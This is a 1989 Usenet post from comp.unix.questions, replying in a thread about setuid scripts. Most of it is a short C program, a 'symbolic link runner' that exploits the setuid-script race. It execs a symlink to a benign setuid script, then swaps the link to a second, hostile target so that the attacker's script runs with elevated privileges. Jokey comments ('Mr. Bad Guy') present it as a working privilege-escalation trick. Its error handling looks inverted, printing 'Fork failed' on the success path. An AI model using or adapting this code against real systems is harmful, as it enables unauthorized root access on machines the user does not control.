setuid scripts
Mitchell..Wright
mitch at hq.af.mil
Wed Oct 25 05:18:38 AEST 1989
In article <20368 at mimsy.umd.edu> chris at mimsy.umd.edu (Chris Torek) writes:
>I suppose there is no particular reason not to let this Abynissian
>out of the carry-sack. Here is the trick:
>
> main()
> ...
>
I think that the timing problem can also be solved by:
#include <stdio.h>
#include <sys/wait.h>
/*
* Symbolic link runner
*
* Please kids - don't try this at home
*
*/
main(argc, argv, envp)
int
argc;
char
**argv,
**envp;
{
char *narg[2];
int pid;
if (argc != 3) {
fprintf(stderr, "Usage: symlink <good> <bad>\n");
exit(1);
}
if (symlink(argv[1], "foo")) {
fprintf(stderr, "symlink bombed <sniff sniff> \n");
exit(2);
}
if (0 == (pid=vfork()))
execve("foo", narg, envp);
else {
fprintf(stderr, "Fork failed \n");
exit(3);
}
/*
* Now we can be Mr. Bad Guy
*
*/
unlink("foo");
symlink (argv[2], "foo");
wait((union wait *)NULL);
unlink("foo");
exit(0);
}
--
..mitch
More information about the Comp.unix.questions
mailing list